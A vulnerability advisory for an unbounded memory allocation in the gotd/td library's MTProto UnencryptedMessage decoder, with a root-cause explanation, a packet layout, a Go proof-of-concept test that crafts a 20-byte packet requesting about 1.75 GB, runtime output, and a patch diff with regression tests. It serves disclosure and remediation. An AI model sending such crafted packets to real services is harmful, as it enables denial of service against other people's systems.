Potential DoS via Unbounded Memory Allocation in proto.UnencryptedMessage.Decode

Executive Summary

A potential Denial of Service (DoS) vulnerability via uncontrolled resource consumption has been identified in the github.com/gotd/td library.

The issue resides within the Decode method of the UnencryptedMessage structure inside proto/unencrypted_message.go. By sending a crafted unencrypted MTProto packet with an attacker-controlled dataLen field, a remote unauthenticated attacker may force the application to perform extremely large heap allocations before validating whether the underlying buffer actually contains the claimed payload length.

This behavior may trigger heavy CPU utilization due to large heap allocation, memory zero-initialization, and increased Garbage Collection (GC) activity, potentially leading to process availability degradation or termination by the operating system's Out-Of-Memory (OOM) killer.

Vulnerability Classifications

CWE-770: Allocation of Resources Without Limits or Throttling

CWE-789: Uncontrolled Memory Allocation

Technical Analysis & Root Cause

The vulnerability originates from a parsing anti-pattern where dynamic memory allocation depends directly on untrusted input before boundary validation occurs.

Vulnerable Code Snippet (proto/unencrypted_message.go)

dataLen, err := b.Int32() if err != nil { return err } u.MessageData = append(u.MessageData[:0], make([]byte, dataLen)...) if err := b.ConsumeN(u.MessageData, int(dataLen)); err != nil { return errors.Wrap(err, "consume payload") } 

Root Cause Breakdown

Untrusted Length Usage

The dataLen value is decoded directly from attacker-controlled network input and is immediately used during heap allocation without validating whether the requested size is reasonable or whether sufficient bytes remain in the underlying buffer.

Pre-Validation Allocation

The following allocation occurs before any payload boundary verification:

make([]byte, dataLen) 

The Go runtime attempts to provision and zero-initialize the requested heap allocation immediately, which can introduce substantial CPU and memory pressure when large values are supplied.

Delayed Validation

Actual payload validation only occurs later during:

b.ConsumeN(...) 

At this stage, resource consumption has already occurred.

Packet Layout & Payload Explanation

The crafted packet structure maps as follows:

OffsetFieldDescription0x00 - 0x07auth_key_idMust be 0 for unencrypted messages0x08 - 0x0Fmessage_idArbitrary 64-bit identifier0x10 - 0x13dataLenAttacker-controlled 32-bit length field

By setting the 4 bytes at offset 0x10-0x13 to a very large integer (e.g. 0x70000000), the decoder attempts to allocate an extremely large heap buffer even though no payload bytes follow the header.

Remote Exploitability

Pre-Authentication Reachability

UnencryptedMessage handles unauthenticated MTProto traffic. An attacker does not require valid credentials or authenticated session state to reach this parsing path.

Network Exposure

Applications exposing MTProto parsing functionality to untrusted peers may be vulnerable because the parser operates directly on inbound network-controlled data streams.

GC Amplification

Repeated transmission of malformed packets may force excessive garbage collection cycles and sustained CPU pressure, potentially degrading service responsiveness and starving legitimate workloads.

Security Impact Classification

Impact Scope

The impact is limited to process availability degradation through attacker-controlled resource exhaustion.

Exclusions

No evidence currently suggests:

Memory corruption

Out-of-bounds write primitives

Arbitrary code execution (ACE/RCE)

Proof of Concept (PoC)

The following Go test case demonstrates the allocation behavior and records runtime statistics.
package main import (  "encoding/binary"  "fmt"  "runtime"  "testing"  "time"  "github.com/gotd/td/bin"  "github.com/gotd/td/proto" ) func TestUnboundedAllocationDoS(t *testing.T) {  // Crafted 20-byte malicious packet  const evilLen uint32 = 0x70000000 // ~1.75 GB request  payload := make([]byte, 20)  // auth_key_id = 0  binary.LittleEndian.PutUint64(payload[0:8], 0)  // message_id = arbitrary  binary.LittleEndian.PutUint64(payload[8:16], 1)  // dataLen = attacker-controlled allocation size  binary.LittleEndian.PutUint32(payload[16:20], evilLen)  fmt.Printf("[+] Requested Allocation: %d bytes (~%.2f GB)\n",   evilLen,   float64(evilLen)/(1024*1024*1024),  )  var memBefore runtime.MemStats  runtime.ReadMemStats(&memBefore)  start := time.Now()  var msg proto.UnencryptedMessage  buf := &bin.Buffer{Buf: payload}  err := msg.Decode(buf)  duration := time.Since(start)  var memAfter runtime.MemStats  runtime.ReadMemStats(&memAfter)  fmt.Printf("[+] Decode Result: %v\n", err)  fmt.Printf("[+] Execution Time: %v\n", duration)  fmt.Printf("[+] Heap Allocation Delta: %d MB\n",   (memAfter.Alloc-memBefore.Alloc)/1024/1024,  )  if duration > 1*time.Second {   t.Fatalf("Potential resource exhaustion condition detected")  } } 

Example Runtime Output

=== RUN TestUnboundedAllocationDoS [+] Requested Allocation: 1879048192 bytes (~1.75 GB) [+] Decode Result: consume payload: unexpected EOF [+] Execution Time: 4.36425s [+] Heap Allocation Delta: 1792 MB --- FAIL: TestUnboundedAllocationDoS (4.37s) FAIL 

On constrained environments or containers with strict memory limits, this condition may also trigger immediate OOM termination.

Remediation Recommendation

Validate the requested dataLen before performing any heap allocation.

Proposed Fix

dataLen, err := b.Int32() if err != nil { return err } // Validate before allocation if dataLen < 0 || int(dataLen) > b.Len() { return errors.Errorf( "invalid dataLen %d exceeds remaining buffer length %d", dataLen, b.Len(), ) } u.MessageData = append( u.MessageData[:0], make([]byte, dataLen)..., ) if err := b.ConsumeN(u.MessageData, int(dataLen)); err != nil { return errors.Wrap(err, "consume payload") } 

Reported By: Ayman (Security Researcher)

--- a/proto/unencrypted_message.go
+++ b/proto/unencrypted_message.go
@@ -1,6 +1,8 @@
 package proto
 
 import (
+	"io"
+
 	"github.com/go-faster/errors"
 
 	"github.com/gotd/td/bin"
@@ -36,6 +38,15 @@ func (u *UnencryptedMessage) Decode(b *bin.Buffer) error {
 	dataLen, err := b.Int32()
 	if err != nil {
 		return err
+	}
+	if dataLen < 0 {
+		return &bin.InvalidLengthError{
+			Length: int(dataLen),
+			Where:  "plaintext message data",
+		}
+	}
+	if int(dataLen) > b.Len() {
+		return errors.Wrap(io.ErrUnexpectedEOF, "consume payload")
 	}
 	u.MessageData = append(u.MessageData[:0], make([]byte, dataLen)...)
 	if err := b.ConsumeN(u.MessageData, int(dataLen)); err != nil {

--- a/proto/unencrypted_message_test.go
+++ b/proto/unencrypted_message_test.go
@@ -1,6 +1,7 @@
 package proto
 
 import (
+	"io"
 	"testing"
 
 	"github.com/gotd/td/bin"
@@ -23,4 +24,33 @@ func TestUnencryptedMessage_Encode(t *testing.T) {
 	}
 	require.Equal(t, d, decoded)
 	require.Zero(t, b.Len(), "buffer should be consumed")
+}
+
+func TestUnencryptedMessage_DecodeInvalidDataLength(t *testing.T) {
+	t.Run("Negative", func(t *testing.T) {
+		b := new(bin.Buffer)
+		b.PutLong(0)
+		b.PutLong(1)
+		b.PutInt32(-1)
+
+		var decoded UnencryptedMessage
+		err := decoded.Decode(b)
+		require.Error(t, err)
+
+		var lengthErr *bin.InvalidLengthError
+		require.ErrorAs(t, err, &lengthErr)
+		require.Zero(t, decoded.MessageData)
+	})
+
+	t.Run("ExceedsRemainingBuffer", func(t *testing.T) {
+		b := new(bin.Buffer)
+		b.PutLong(0)
+		b.PutLong(1)
+		b.PutInt32(1024)
+
+		var decoded UnencryptedMessage
+		err := decoded.Decode(b)
+		require.ErrorIs(t, err, io.ErrUnexpectedEOF)
+		require.Zero(t, decoded.MessageData)
+	})
 }

